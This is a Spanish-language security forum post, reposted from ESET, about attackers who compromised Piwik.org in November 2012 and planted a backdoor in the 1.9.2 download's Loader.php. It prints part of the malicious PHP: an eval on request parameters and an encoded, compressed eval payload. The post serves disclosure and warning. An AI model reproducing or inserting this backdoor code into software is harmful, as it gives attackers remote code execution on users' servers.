Underc0de

[In]Seguridad Informática => Seguridad => Mensaje iniciado por: Mavis en Noviembre 30, 2012, 09:48:06 PM

Título: Servidor de Piwik vulnerado y utilizado para propagar código malicioso
Publicado por: Mavis en Noviembre 30, 2012, 09:48:06 PM
El servidor web de Piwik.org (http://es.piwik.org/) fue vulnerado el día 26 de Noviembre por un atacante. El ciberdelincuente modificó el archivo zip disponible para la descarga por parte de los usuarios correspondiente a la versión 1.9.2, agregando código malicioso en el interior de dicho archivo.

Piwik es una herramienta open source que permite recolectar estadísticas sobre un servidor web. Además posee funcionalidades tales como la generación de reportes detallados sobre los visitantes que recibe un sitio web, realización de campañas de marketing, entre otras.

Aparentemente, y según el propio blog de Piwik (http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/), el atacante habría comprometido el servidor por una vulnerabilidad en un plugin de WordPress.

Luego del compromiso, el archivo descargable se mantuvo con la modificación del código malicioso durante algunas horas, por lo que los usuarios que hayan descargado el software durante ese período obtuvieron una versión maliciosa del mismo. Específicamente, el archivo modificado fue Loader.php ubicado dentro de la carpeta piwik/core/. A continuación se adjunta parte del código malicioso:

Código (php) [Seleccionar]
<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e"$_GET['g'], 'dwm');     exit;
}
if (
file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(
gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKat


Según información del propio foro de discusión de Piwik (http://forum.piwik.org/read.php?2,97666), el código malicioso insertado corresponde a un backdoor que permitiría al atacante ejecutar cualquier función válida que pueda ejecutarse mediante eval().

En el caso de que se haya instalado la versión modificada es recomendable seguir los siguientes pasos para solucionar el problema:


Cabe destacar que ningún tipo de información correspondiente a los usuarios de este software ha sido extraída del servidor vulnerado debido a que el mismo no guarda información correspondiente a sus usuarios.

El compromiso de servidores web por parte de los ciberdelincuentes tiene distintas motivaciones. En este caso fue la modificación de parte del software disponible para infectar a aquellos usuarios que descargan el mismo.

Se recomienda a todos los usuarios que naveguen en la web estar en alerta, tener cuidado y revisar siempre sus descargas. Todo sistema puede ser vulnerado, incluso cuando menos lo pensamos.

Saludos!

Fuente: Laboratorios ESET